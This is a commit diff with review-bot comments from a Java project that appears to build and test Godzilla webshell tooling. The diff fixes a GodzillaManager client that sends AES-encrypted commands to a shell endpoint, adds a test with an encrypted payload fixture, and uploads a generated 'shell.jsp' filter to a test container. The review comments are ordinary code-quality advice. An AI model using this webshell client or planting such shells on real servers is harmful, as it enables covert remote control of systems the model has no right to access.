fix: godzilla manager test failed
ReaJason committed Nov 26, 2024
1 parent 957566f commit 272188a
Showing 4 changed files with 50 additions and 32 deletions.
Expand Up @@ -29,7 +29,7 @@
public class GodzillaManager implements Closeable {
private final OkHttpClient client;
private static final List<String> CLASS_NAMES;
private String J_SESSION_ID = "";
private String cookie = "";
private String entrypoint;
private String key;
private String pass;
Expand Down Expand Up @@ -96,18 +96,18 @@ public GodzillaManager() {
}

private Response post(byte[] bytes) throws IOException {
byte[] aes = aes(bytes, true);
byte[] aes = aes(this.key, bytes, true);
assert aes != null;
String base64String = Base64.encodeBase64String(aes);
RequestBody requestBody = new FormBody.Builder()
.add("pass", base64String)
.add(this.pass, base64String)
.build();
Request.Builder builder = new Request.Builder()
.url(this.entrypoint)
.post(requestBody)
.headers(Headers.of(this.headers));
if (StringUtils.isNotBlank(J_SESSION_ID)) {
builder.header("Cookie", J_SESSION_ID);
if (StringUtils.isNotBlank(cookie)) {
builder.header("Cookie", cookie);
}
return client.newCall(builder.build()).execute();
}
Expand All @@ -128,7 +128,7 @@ public boolean start() {
try (Response response = post(bytes)) {
String setCookie = response.header("Set-Cookie");
if (setCookie != null && setCookie.contains("JSESSIONID=")) {
J_SESSION_ID = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
cookie = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
}
return response.code() == 200;
} catch (IOException e) {
Expand All @@ -148,7 +148,6 @@ public boolean test() {
}
return false;
} catch (IOException e) {
e.printStackTrace();
return false;
}
}
Expand All @@ -172,39 +171,48 @@ public void close() throws IOException {
* @param encoding 是否为加密,true 为加密,false 解密
* @return 返回加解密后的字节数组
*/
public byte[] aes(byte[] bytes, boolean encoding) {
System.out.println(key);
public static byte[] aes(String key, byte[] bytes, boolean encoding) {
try {
Cipher c = Cipher.getInstance("AES");
c.init(encoding ? 1 : 2, new SecretKeySpec(this.key.getBytes(), "AES"));
c.init(encoding ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES"));
return c.doFinal(bytes);
} catch (Exception e) {
e.printStackTrace();
return null;
return new byte[0];
}
}

private boolean isValidResponse(String response) {
if (StringUtils.isEmpty(response)) {
return false;
}
return response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
return response.length() > 32 && response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
}

public String getResultFromRes(String responseBody) throws IOException {
if (!isValidResponse(responseBody)) {
return responseBody;
}
String result = responseBody.substring(16);
result = result.substring(0, result.length() - 16);
byte[] bytes = Base64.decodeBase64(result);
byte[] x = aes(bytes, false);
byte[] x = aes(this.key, bytes, false);
GZIPInputStream gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(x));
return IOUtils.toString(gzipInputStream, StandardCharsets.UTF_8);
}

Map<String, String> restorePayload(String payload) throws IOException {
String p = URLDecoder.decode(payload, "UTF-8");
public static Map<String, String> restorePayload(String key, String payload) {
String p = payload;
try {
String urlDecoded = URLDecoder.decode(payload, "UTF-8");
if (StringUtils.isNoneBlank(urlDecoded)) {
p = urlDecoded;
}
} catch (UnsupportedEncodingException ignored) {

}
Map<String, String> map = new HashMap<>();
byte[] bytes = Base64.decodeBase64(p);
byte[] x = aes(bytes, false);
byte[] x = aes(key, bytes, false);
ByteArrayInputStream tStream = new ByteArrayInputStream(x);
ByteArrayOutputStream tp = new ByteArrayOutputStream();
byte[] lenB = new byte[4];
Expand All @@ -215,16 +223,16 @@ Map<String, String> restorePayload(String payload) throws IOException {
byte t = (byte) inputStream.read();
if (t != -1) {
if (t == 2) {
String key = tp.toString();
int read1 = inputStream.read(lenB);
String dataKey = tp.toString();
inputStream.read(lenB);
int len = bytesToInt(lenB);
byte[] data = new byte[len];
int readOneLen = 0;
do {
read = readOneLen + inputStream.read(data, readOneLen, data.length - readOneLen);
readOneLen = read;
} while (read < data.length);
map.put(key, new String(data));
map.put(dataKey, new String(data));
tp.reset();
} else {
tp.write(t);
Expand All @@ -249,7 +257,7 @@ public static int bytesToInt(byte[] bytes) {
private byte[] generateMethodCallBytes(String methodName) {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);) {
byte[] value = "close".getBytes();
byte[] value = methodName.getBytes();
gzipOutputStream.write("methodName".getBytes());
gzipOutputStream.write(2);
gzipOutputStream.write(intToBytes(value.length));
Expand Down
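Review bot: In the @@ -172 hunk `aes` now returns `new byte[0]` on every failure and still calls `e.printStackTrace()`, so a wrong key or corrupt ciphertext is indistinguishable from an empty plaintext; the `assert aes != null;` kept in `post` is now dead, and `getResultFromRes` hands the empty array to `new GZIPInputStream(...)`, which fails on the header read with an EOFException instead of an error naming the real cause. Prefer failing loudly with the cause preserved, `throw new IllegalStateException("AES " + (encoding ? "encryption" : "decryption") + " failed", e);`, and drop the dead assert in `post` — or, if the empty-array contract is intentional, state it in the Javadoc `@return` and make sure the Javadoc above the hunk has a `@param key` for the new argument. `key.getBytes()` in `aes` and `new String(data)` in the @@ -215 hunk use the platform default charset; pass `StandardCharsets.UTF_8`, which this file already imports. The `catch (UnsupportedEncodingException ignored)` in `restorePayload` is empty; since the charset name is the literal `"UTF-8"` it cannot fire, so add `// "UTF-8" is always supported by the JVM; decode cannot throw here` or use the Charset overload of `URLDecoder.decode` if the project targets Java 10+. Also in the @@ -215 hunk the return value of `inputStream.read(lenB)` is now discarded, so a short read leaves `lenB` partly stale and `bytesToInt` sizes `new byte[len]` from it; guard with `if (inputStream.read(lenB) != lenB.length) throw new IllegalStateException("truncated length field");`.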
Expand Up @@ -3,6 +3,8 @@
import com.reajason.javaweb.util.ClassUtils;
import org.junit.jupiter.api.Test;

import java.util.Map;

import static org.junit.jupiter.api.Assertions.*;

/**
Expand All @@ -18,4 +20,12 @@ void generateGodzilla() {
System.out.println(o.getClass().getName());
assertNotNull(o);
}

@Test
void testRestorePayload(){
String payload = "k2qs7l3%2F4ZZaGyyrfpBQGg0dXGM%2BFVFxzmCWLnyFEgoPSpSjHre4o1HBHTCFnNDX";
String key = "d8ea7326e6ec5916";
Map<String, String> map = GodzillaManager.restorePayload(key, payload);
assertEquals("test", map.get("methodName"));
}
}
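Review bot: `testRestorePayload` pins a fixed ciphertext to a fixed key without saying what the fixture encodes, so when the payload format changes nobody can regenerate it; add a comment above `String payload`, e.g. `// URL-encoded Base64 of the AES-encrypted (and, judging by restorePayload, gzip-compressed) "methodName" -> "test" call bytes; regenerate via GodzillaManager.aes(key, ...) if the format changes — confirm exact layout`. The test only checks the `methodName` entry; asserting the expected entry count as well would catch spurious extra keys from the parser. Minor style: `void testRestorePayload(){` lacks the space before the brace that `void generateGodzilla() {` uses in the same file.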
Expand Up @@ -52,8 +52,8 @@ private DynamicTest createCustomContainerTest(String imageName) {
int port = container.getMappedPort(8080);
String url = "http://" + host + ":" + port + "/app";
GodzillaShellConfig shellConfig = GodzillaShellConfig.builder()
.pass("pass").key("key")
.headerName("User-Agent").headerValue("test")
.pass("pass123").key("key123")
.headerName("User-Agent").headerValue("hello_integration_test")
.build();
String jspContent = generateGodzillaFilterJsp(shellConfig);
String filename = "shell.jsp";
Expand Down Expand Up @@ -99,7 +99,7 @@ private void uploadJspFileToServer(String uploadUrl, String filename, String fil
}

private void testGodzillaIsOk(String entrypoint, GodzillaShellConfig shellConfig) {
try (GodzillaManager godzillaManager = new GodzillaManager.GodzillaManagerBuilder()
try (GodzillaManager godzillaManager = GodzillaManager.builder()
.entrypoint(entrypoint)
.pass(shellConfig.getPass())
.key(shellConfig.getKey())
Expand Down
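Review bot: `.key("key123")` is 6 characters, while the unit test added in this commit feeds `restorePayload` a 16-character key and `GodzillaManager.aes` passes `key.getBytes()` straight to `SecretKeySpec`, which accepts only 16/24/32-byte AES keys; if `GodzillaManager.builder()` does not derive a 16-byte key from the configured value (not visible here), `aes` would fail and return an empty array, making the integration test fail for a reason unrelated to the container. Worth a one-line comment on the builder call stating which form of key it expects, e.g. `// builder derives the 16-byte AES key from this value` or `// must be exactly 16 bytes`, whichever is true. The rest of `testGodzillaIsOk` continues outside the hunk.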
16 changes: 8 additions & 8 deletions vul-webapp/src/main/webapp/WEB-INF/web.xml
Expand Up @@ -24,12 +24,12 @@
<url-pattern>/upload</url-pattern>
</servlet-mapping>

<filter>
<filter-name>godzilla</filter-name>
<filter-class>ErrorHandler</filter-class>
</filter>
<filter-mapping>
<filter-name>godzilla</filter-name>
<url-pattern>/test_filter</url-pattern>
</filter-mapping>
<!-- <filter>-->
<!-- <filter-name>godzilla</filter-name>-->
<!-- <filter-class>ErrorHandler</filter-class>-->
<!-- </filter>-->
<!-- <filter-mapping>-->
<!-- <filter-name>godzilla</filter-name>-->
<!-- <url-pattern>/test_filter</url-pattern>-->
<!-- </filter-mapping>-->
</web-app>
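Review bot: The `godzilla` filter and its mapping are commented out rather than removed, and nothing says why or whether they are meant to come back, so a reader of web.xml cannot tell whether this is a temporary test toggle or dead configuration. Either delete the block (version history keeps it) or replace the eight commented lines with a single `<!-- godzilla test filter disabled: <reason>; re-enable for <test name> -->` so the intent is recorded. Leaving a complete filter definition in a comment also makes it easy to re-enable in a deployed descriptor by mistake.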
